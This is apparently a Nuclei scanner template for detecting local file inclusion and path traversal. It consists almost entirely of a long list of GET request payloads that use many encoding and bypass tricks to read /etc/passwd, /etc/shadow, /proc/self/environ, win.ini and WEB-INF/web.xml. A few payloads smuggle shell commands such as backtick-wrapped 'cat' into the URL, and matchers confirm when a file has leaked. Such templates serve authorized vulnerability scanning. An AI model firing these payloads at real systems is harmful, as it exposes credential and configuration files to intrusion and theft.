id: lfi-via-path

info:
  name: Local File Inclusion
  author: reewardius
  severity: high
  tags: lfi,lfr,generic
  
http:
  - method: GET
    path:
      - "{{BaseURL}}/#/../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/#/../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/%00../../../../../../etc/passwd"
      - "{{BaseURL}}//etc/passwd"
      - "{{BaseURL}}///etc/passwd"
      - "{{BaseURL}}////etc/passwd"
      - "{{BaseURL}}/%00../../../../../../etc/shadow"
      - "{{BaseURL}}//etc/shadow"
      - "{{BaseURL}}/%00/etc/passwd%00"
      - "{{BaseURL}}/%00/etc/shadow%00"
      - "{{BaseURL}}/%0a/bin/cat%20/etc/passwd"
      - "{{BaseURL}}/%0a/bin/cat%20/etc/shadow"
      - "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/shells"
      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/shells"
      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells"
      - "{{BaseURL}}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/*/../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/*/../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/shells"
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
      - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/shells"
      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
      - "{{BaseURL}}/..%253B/WEB-INF/web.xml"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells"
      - "{{BaseURL}}/..%3B/WEB-INF/web.xml"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/..%5c..%5cetc/passwd"
      - "{{BaseURL}}/..%5c..%5cetc/shells"
      - "{{BaseURL}}/..%5cetc/passwd"
      - "{{BaseURL}}/..%5cetc/shells"
      - "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
      - "{{BaseURL}}/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/hosts"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/hosts%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/shadow"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/shadow%00"
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.html"
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd%00.jpg"
      - "{{BaseURL}}/../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../etc/shadow"
      - "{{BaseURL}}/../../../../../../../../../C:/Windows/win.ini"
      - "{{BaseURL}}/../../../../../../../../../etc/shells"
      - "{{BaseURL}}/../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/../../../../../../../etc/environment"
      - "{{BaseURL}}/../../../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../WEB-INF/web.xml;x="
      - "{{BaseURL}}/../../WEB-INF/web.xml"
      - "{{BaseURL}}/..///////..////..//////etc/shells"
      - "{{BaseURL}}/..///////..////..//////windows/win.ini"
      - "{{BaseURL}}/../WEB-INF/web.xml"
      - "{{BaseURL}}/../WEB-INF/web.xml;x="
      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/shells"
      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
      - "{{BaseURL}}/..;/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..etc\\passwd"
      - "{{BaseURL}}/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"
      - "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/./../../../../../../../../../../etc/shells"
      - "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
      - "{{BaseURL}}/./././././././././././etc/passwd"
      - "{{BaseURL}}/./././././././././././etc/shadow"
      - "{{BaseURL}}//&apos;/bin/cat%20/etc/passwd//&apos;"
      - "{{BaseURL}}//..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd"
      - "{{BaseURL}}//////////etc/environment"
      - "{{BaseURL}}/;/..;/WEB-INF/web.xml;x="
      - "{{BaseURL}}/;/;/WEB-INF/web.xml"
      - "{{BaseURL}}/?action=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?admin=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?answer=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?api=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?blog=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?browse=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?callback=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?cat=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?conf=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?console=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?contact=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?contact_us=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?content=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?create=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?data=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?date=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?day=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?debug=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?default=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?delete=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?detail=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?dir=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?dirs=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?doc=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?download=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?edit=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?email=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?emailto=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?enddate=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?error=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?error_page=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?export=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?f=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?file=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?file=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/?fileName=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/?filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/?filename=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?filename=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/?files=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?find=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?folder=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?guest=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?id=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?imagine=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?import=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?inc=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?inc=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?include=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?info=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?information=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?item=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?jsonp=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?key=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?keyword=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?keywords=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?l=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?lang=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?language=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?layout=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?link=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?locate=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?login=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?logout=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?manual=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?mod=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?modify=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?month=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?name=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?news=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?p=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?page=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?page_id=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?password=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?path=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?pdf=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?pg=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?prefix=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?prefix=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?private=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?profile=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?public=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?q=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?query=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?register=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?root=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?s=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?search=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?server=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?show=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?site=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?style=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?template=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?terms=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?text=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?to=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?token=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?tutorial=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?type=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?upload=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?uri=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/?url=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?user_id=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?username=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/?view=../../../../../../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/config?conf=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/config?file=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/config?filename=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/ctxroot/%C0%AE/WEB-INF/web.xml"
      - "{{BaseURL}}/demo/../WEB-INF/web.xml"
      - "{{BaseURL}}/doc?file=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/doc?filename=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/download?file=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/download?filename=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/download?url=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/etc/environment"
      - "{{BaseURL}}/etc/passwd"
      - "{{BaseURL}}/etc/shells"
      - "{{BaseURL}}/file:///C:/Windows/win.ini"
      - "{{BaseURL}}/file?doc=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/file?filename=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/file?path=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/image?filename=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/index.php?page=....//....//etc/shells"
      - "{{BaseURL}}/index.php?page=....//....//windows/win.ini"
      - "{{BaseURL}}/index.php?page=../../etc/shells"
      - "{{BaseURL}}/index.php?page=../../windows/win.ini"
      - "{{BaseURL}}/index.php?page=etc/shells"
      - "{{BaseURL}}/index.php?page=etc/shells%00"
      - "{{BaseURL}}/index.php?page=windows/win.ini"
      - "{{BaseURL}}/index.php?page=windows/win.ini%00"
      - "{{BaseURL}}/js/app/../../WEB-INF/web.xml%3bx%3d/"
      - "{{BaseURL}}/js/app//../../WEB-INF/web.xml"
      - "{{BaseURL}}/js/app//../WEB-INF/web.xml"
      - "{{BaseURL}}/js/app//../WEB-INF/web.xml%C0%80.jsp"
      - "{{BaseURL}}/js/app/1//../../WEB-INF/web.xml%C0%80.jsp"
      - "{{BaseURL}}/plugins//../WEB-INF/web.xml%C0%80.jsp"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5c..%5cetc/shells"
      - "{{BaseURL}}/static/..%5c..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5c..%5cetc/shells"
      - "{{BaseURL}}/static/..%5cetc/passwd"
      - "{{BaseURL}}/static/..%5cetc/shells"
      - "{{BaseURL}}/url?filename=../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/web-inf/web.xml"
      - "{{BaseURL}}/wiki/struts/..%252f..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..etc\\passwd"
      - "{{BaseURL}}\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"
      - '{{BaseURL}}/%20cat%20/../../../../../etc/passwd'
      - '{{BaseURL}}/%253f/../../../../../../../../../etc/passwd'
      - '{{BaseURL}}/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2fpasswd'
      - '{{BaseURL}}/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
      - '{{BaseURL}}/%60cat%20etc%2Fpasswd%60'
      - '{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd%00'
      - '{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd'
      - '{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
      - '{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'
      - '{{BaseURL}}/..%252f..%252f..%252f..%252fetc/passwd'
      - '{{BaseURL}}/../../../../../../../../../../../../../../etc/shadow'
      - '{{BaseURL}}/../../../../../..//etc/passwd'
      - '{{BaseURL}}/../../../../../../etc/shells&=%3C%3C%3C%3C'
      - '{{BaseURL}}/..;/../../../etc/passwd'
      - '{{BaseURL}}/..;////etc/passwd'
      - '{{BaseURL}}/..;/;/etc/passwd'
      - '{{BaseURL}}/..;/etc/passwd'
      - '{{BaseURL}}///....//....//....//....//....//....//....//....//etc//passwd'
      - '{{BaseURL}}///////../../../etc/passwd%00'
      - '{{BaseURL}}///////../../../etc/passwd'
      - '{{BaseURL}}/;%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64'
      - '{{BaseURL}}/;/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64'
      - '{{BaseURL}}/;/....//....//....//....//....//....//....//....//etc//passwd'
      - '{{BaseURL}}/;/../../../../../../../../etc/passwd'
      - '{{BaseURL}}/;/etc/passwd'
      - '{{BaseURL}}/@fs/etc/passwd'
      - '{{BaseURL}}/L2V0Yy9wYXNzd2Q%3D'
      - '{{BaseURL}}/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D'
      - '{{BaseURL}}/ZXRjL3Bhc3N3ZA%3D%3D'
      - '{{BaseURL}}/`cat${IFS}etc/passwd`'
      - '{{BaseURL}}/cat%20/../../../../../etc/passwd'
      - '{{BaseURL}}/etc/passwd%00'
      - '{{BaseURL}}/etc/passwd'
      - '{{BaseURL}}/etc/shadow%00'
      - '{{BaseURL}}/etc/shells'
      - '{{BaseURL}}/file:///etc/passwd'
      - '{{BaseURL}}/proc/self/environ'
      - '{{BaseURL}}/static/js/../../../../../../../../../etc/passwd'
      - '{{BaseURL}}/static/js/../../../../../etc/passwd'
      - '{{BaseURL}}/static/js/../etc/passwd'
      - '{{BaseURL}}/static/js/etc/passwd'
      - "{{BaseURL}}/download.php?file=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/download.php?fileName=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/download.php?filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}/download.php?filename=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
        
      - type: word
        part: body
        words:
          - "bit app support"
          - "sample HOSTS file"
          - "[fonts]"
          - "[extensions]"
          - "[mci extensions]"
        condition: or

      - type: word
        part: body
        words:
          - "SHELL="
          - "USER="
          - "PATH="
        condition: and
        
      - type: word
        part: body
        words:
          - "PATH=/"
          
      - type: word
        words:
          - "# valid login shells"
          - "/bin/sh"
          - "/bin/ash"
          - "/bin/bash"
        condition: and
        part: body
        
      - type: word
        part: body
        words:
          - "<web-app"
          - "</web-app"
        condition: and